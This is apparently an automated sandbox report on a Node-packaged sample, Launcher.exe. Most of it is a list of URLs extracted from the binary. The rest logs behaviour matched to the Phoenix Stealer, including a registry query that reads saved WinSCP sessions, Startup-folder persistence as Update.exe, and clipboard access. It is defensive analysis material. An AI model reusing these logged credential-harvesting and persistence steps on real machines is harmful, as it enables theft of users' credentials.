          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
          Source: Launcher.exe, 00000000.00000003.1118712238.00000174E043A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/http.html#http_message_headers
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/n-api.html#node-api-version-matrix)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/n-api.html)
          Source: Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/zlib.html#zlib_class_options
          Source: Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/latest/docs/api/n-api.html#n_api_n_api)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/node-v18.5.0-headers.tar.gz
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/node-v18.5.0.tar.gz
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/node-v18.5.0.tar.gzhttps://nodejs.org/download/release/v
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/win-x64/node.lib
          Source: Launcher.exe, 00000000.00000003.1266819434.00000038D8AC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://npmjs.org/~jpommerening
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
          Source: Launcher.exe, 00000000.00000003.1122482358.00000174E0410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/underagechilderen/duck/main/ducklogo.png
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0589000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1396760803.00000174E0DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://registry.npmjs.org/
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://registry.npmjs.org/)
          Source: Launcher.exe, 00000000.00000003.1138033598.00000174E04E3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://robwu.nl/)
          Source: Launcher.exe, 00000000.00000003.1280865643.0000036048281000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ruben.verborgh.org/)
          Source: Launcher.exe, 00000000.00000003.1131941974.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1135628118.00000174E0460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://server.net/
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sheetjs.com/
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
          Source: Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sqlite.org/)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
          Source: Launcher.exe, 00000000.00000003.1439427235.00000174E0A1B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1451888131.00000174E0A1F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440789272.00000174E0555000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1455742179.00000174E046E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1451888131.00000174E0A29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc8032
          Source: Launcher.exe, 00000000.00000003.1439427235.00000174E0A1B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440789272.00000174E0555000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1455742179.00000174E046E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1451888131.00000174E0A29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc8410#section-10.3
          Source: Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08DE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0950000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08F2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://travis-ci.org/lodash/lodash-cli
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#forbidden-host-code-point
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url-serializing
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://v8.dev/blog/v8-release-89
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-mark-resource-timing
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-setup-the-resource-timing-entry
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://webassembly.github.io/spec/web-api
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
          Source: Launcher.exe, 00000000.00000003.1255111010.000002C308E41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1158702898.00000174E0538000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.archiverjs.com/zip-stream/ZipStream.html
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
          Source: Launcher.exe, 00000000.00000003.1424919095.00000174E0500000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1424919095.00000174E0510000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428062025.0000036048281000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2011/february/double-hmac-verificati
          Source: Launcher.exe, 00000000.00000003.1118712238.00000174E043A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/form-data
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/sqlite3)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sqlite.org/json1.html)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
          Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownHTTPS traffic detected: 144.2.14.25:443 -> 192.168.2.16:49795 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Yara detected Phoenix Stealer
          Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 6848, type: MEMORYSTR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F4993A933_2_00007FFF8F4993A9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00007FFF8F4909B233_2_00007FFF8F4909B2
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\pkg-Ztzknl\59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041 0DE74A34D95A30EED84CDF31F0DC5868C59B7977D3D496845C9363812235B768
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\pkg-Ztzknl\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442 F806F89DC41DDE00CA7124DC1E649BDC9B08FF2EFF5C891B764F3E5AEFA9548C
          Source: Launcher.exe, 00000000.00000000.1086952765.00007FF65ECDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameProjectD vs Launcher.exe
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
          Source: classification engineClassification label: mal100.phis.troj.adwa.spyw.expl.winEXE@78/139@21/7
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03
          Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkgJump to behavior
          Source: Launcher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
          Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
          Source: C:\Users\user\Desktop\Launcher.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1358740310.00000174E09E8000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380081872.00000174E0D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: Launcher.exe, 00000000.00000003.1380081872.00000174E0D73000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227836563.00000174E0BC3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1327224574.00000174E130B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
